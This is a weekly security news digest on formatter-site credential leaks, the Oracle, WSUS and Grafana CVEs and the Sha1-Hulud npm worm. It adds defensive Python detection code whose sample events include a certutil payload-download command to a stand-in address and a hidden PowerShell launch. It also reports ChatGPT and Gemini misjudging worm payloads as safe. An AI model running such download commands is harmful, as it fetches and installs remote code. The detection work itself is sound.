Programmer’s Digest #161
11/19/2025-11/26/2025 JSONFormatter and CodeBeautify, Critical Oracle Identity Manager Flaw, Attackers Innovating on npm And More
1. Years of JSONFormatter and CodeBeautify Leaks Expose Thousands of Passwords and API Keys
New research shows that organizations across sensitive sectors — including governments, telecoms, and critical infrastructure — have been pasting passwords and credentials into online formatting tools like JSONFormatter and CodeBeautify. Cybersecurity firm watchTowr Labs collected over 80,000 publicly accessible files containing thousands of usernames, passwords, authentication keys, database and cloud credentials, API keys, and even SSH session recordings. The dataset includes five years of JSONFormatter history and one year from CodeBeautify, totaling over 5GB of exposed data. Affected sectors range from finance and healthcare to aerospace and cybersecurity.
The issue stems from these tools’ “save” feature, which creates predictable, shareable URLs that can be easily scraped. Researchers found leaked Jenkins secrets, bank KYC data, and AWS credentials—and even saw fake keys they uploaded targeted within 48 hours, indicating active exploitation. Following the findings, both sites disabled the save function, saying they are working on improved safety measures.
2. Critical Oracle Identity Manager Flaw Possibly Exploited as Zero-Day
A critical vulnerability (CVE-2025-61757) in Oracle Identity Manager, disclosed by Searchlight Cyber, may have been exploited as a zero-day before being patched in October 2025. This pre-authentication flaw allows attackers to bypass security, execute code, and fully compromise systems, potentially breaching servers containing sensitive user data.
The SANS Institute checked its honeypot logs after technical details were made public. They discovered scanning activity for the vulnerability occurring between August 30 and September 9—weeks before Oracle’s patch was available. This suggested potential early exploitation. However, Searchlight Cyber has since clarified that this observed activity was not from malicious actors. The company confirmed that the scans were conducted by its own security researchers as part of their investigation and efforts to notify organizations at risk. Therefore, while the vulnerability was severe, the pre-patch scanning appears to have been benign research.
3. The Second Coming of Shai-Hulud: Attackers Innovating on npm
The Shai-Hulud campaign has returned with improved automation and persistence, now rebranded as “Sha1-Hulud.” In days, it has generated thousands of malicious npm packages, even hijacking legitimate ones. First seen in 2025, the worm automatically clones itself across repositories; this new variant is more advanced and still spreading. Researchers at Wiz, Aikido, and Sonatype have identified over 2,100 malicious packages, showing how attackers now weaponize the same automation developers rely on.
Sha1-Hulud steals npm tokens, GitHub credentials, and cloud keys from infected systems, then uses them to publish new packages—turning developer pipelines into its distribution network. Large, complex samples helped it evade AI-based code analysis, with ChatGPT and Gemini incorrectly classifying the payloads as safe. This shift marks an evolution from compromising individual packages to exploiting the entire software ecosystem.
The campaign highlights accelerating attacker innovation and the need for rapid, automated defensive controls across dependency management, credentials, and CI/CD pipelines.
4. ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access
A critical vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, is being actively exploited to distribute the sophisticated ShadowPad malware. This flaw, a critical deserialization issue patched last month, allows attackers to execute remote code with system-level privileges.
Following the public release of a proof-of-concept exploit, threat actors have weaponized the vulnerability. They target exposed WSUS servers to gain initial access, using tools like PowerCat to obtain a system shell. They then leverage Windows utilities like certutil and curl to download and install ShadowPad from a remote server.
ShadowPad is a modular backdoor, widely considered a successor to PlugX and often linked to Chinese state-sponsored groups. It employs stealth techniques like DLL side-loading through a legitimate executable to launch its payload. Once active, the malware establishes a persistent presence and can load various plugins, posing a severe threat to compromised systems. This activity highlights the rapid weaponization of critical vulnerabilities.
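As an added detection example (not from the report or any vendor), the Python triage below flags the process chain described above in Sysmon-style process-creation events: a shell launched by the WSUS host process, and certutil or curl fetching a URL, escalated when the downloader was launched from a shell. The WSUS process names in WSUS_PROCESSES, the event field names and the sample events are assumptions and constructed data, not real telemetry.

```python
import re
from typing import Iterable

DOWNLOADERS = {"certutil.exe", "curl.exe"}        # LOLBins named in the report
SHELLS = {"cmd.exe", "powershell.exe"}            # a reverse shell lands in one of these
WSUS_PROCESSES = {"wsusservice.exe", "w3wp.exe"}  # assumed WSUS host process names
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> list[str]:
    """Reasons a process-creation event matches the WSUS -> shell -> download chain.
    An empty list means nothing matched."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in WSUS_PROCESSES and image in SHELLS:
        reasons.append("shell spawned by WSUS host process")
    if image in DOWNLOADERS and URL_RE.search(cmd):
        reasons.append(f"{image} fetching remote content")
        if parent in SHELLS:
            reasons.append("downloader launched from an interactive shell")
    return reasons


def scan(events: Iterable[dict]) -> list[tuple[int, list[str]]]:
    """Pair each suspicious event's ProcessId with the reasons it was flagged."""
    return [(e["ProcessId"], r) for e in events if (r := triage(e))]


# Constructed sample events (TEST-NET address, not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessId": 4101, "ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c powershell -nop -w hidden"},
    {"ProcessId": 4122, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://203.0.113.5/update.bin C:\\Windows\\Temp\\update.bin"},
    {"ProcessId": 4150, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\curl.exe", "CommandLine": "curl --version"},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```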
5. Grafana Warns of Max Severity Admin Spoofing Vulnerability
Grafana Labs has disclosed a critical vulnerability (CVE-2025-41115) in Grafana Enterprise that could allow new users to be treated as administrators or enable privilege escalation. The flaw is only exploitable when SCIM provisioning is enabled, with both the enableSCIM flag and user_sync_enabled set to true. Due to a design issue, a malicious SCIM client could supply a numeric externalId—mapped directly to Grafana’s internal user.uid—allowing impersonation of existing accounts, including the admin user. SCIM remains a limited-support “Public Preview,” so exposure may be low.
The issue affects Grafana Enterprise versions 12.0.0–12.2.1; Grafana OSS is not impacted. Grafana Cloud and managed services have already been patched. Self-managed users should upgrade to versions 12.3.0, 12.2.1, 12.1.3, or 12.0.6, or disable SCIM. Grafana says the bug was discovered internally on November 4, fixed within 24 hours, and found not to be exploited in the cloud. Users are urged to patch immediately.
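Added example, not Grafana's own code: a Python exposure check for the conditions above (Enterprise edition, a build in the stated affected range, both SCIM flags on) together with a detection rule for the purely numeric externalId shape the advisory describes. The grafana.ini spelling of the two flags ([feature_toggles] enableSCIM and [auth.scim] user_sync_enabled) is an assumption, and the sample configs are constructed.

```python
import configparser
import re

# Affected range as stated in the advisory summary (inclusive).
AFFECTED_MIN, AFFECTED_MAX = (12, 0, 0), (12, 2, 1)


def parse_version(text: str) -> tuple:
    """Numeric (major, minor, patch) of a Grafana version string such as 'v12.1.3'."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return tuple(int(x) for x in m.groups())


def scim_enabled(ini_text: str) -> bool:
    """True only when both flags named in the advisory are on. The ini key spelling
    ([feature_toggles] enableSCIM and [auth.scim] user_sync_enabled) is an assumption."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)
    toggle = cfg.getboolean("feature_toggles", "enableSCIM", fallback=False)
    sync = cfg.getboolean("auth.scim", "user_sync_enabled", fallback=False)
    return toggle and sync


def exposed(edition: str, version: str, ini_text: str) -> bool:
    """Exposure needs Enterprise, a build in the affected range, and SCIM user sync on.
    12.2.1 appears both as affected and as a fix version in the summary, so the version
    check errs toward flagging it and lets the SCIM flags decide."""
    if edition.strip().lower() != "enterprise":
        return False                      # Grafana OSS is not impacted
    in_range = AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX
    return in_range and scim_enabled(ini_text)


def suspicious_external_id(scim_user: dict):
    """Detection rule for an inbound SCIM user payload: a purely numeric externalId is
    the shape that could be mapped onto an internal user.uid. Returns it or None."""
    ext = scim_user.get("externalId")
    if isinstance(ext, int) or (isinstance(ext, str) and ext.isdigit()):
        return str(ext)
    return None


# Constructed sample configs (not from a real deployment).
WEAK_INI = "[feature_toggles]\nenableSCIM = true\n\n[auth.scim]\nuser_sync_enabled = true\n"
SAFE_INI = WEAK_INI.replace("user_sync_enabled = true", "user_sync_enabled = false")

if __name__ == "__main__":
    print(exposed("Enterprise", "12.2.0", WEAK_INI))   # affected build, SCIM sync on
    print(exposed("Enterprise", "12.2.0", SAFE_INI))   # SCIM sync disabled
    print(exposed("OSS", "12.2.0", WEAK_INI))          # OSS is not affected
    print(suspicious_external_id({"userName": "alice", "externalId": "1"}))
```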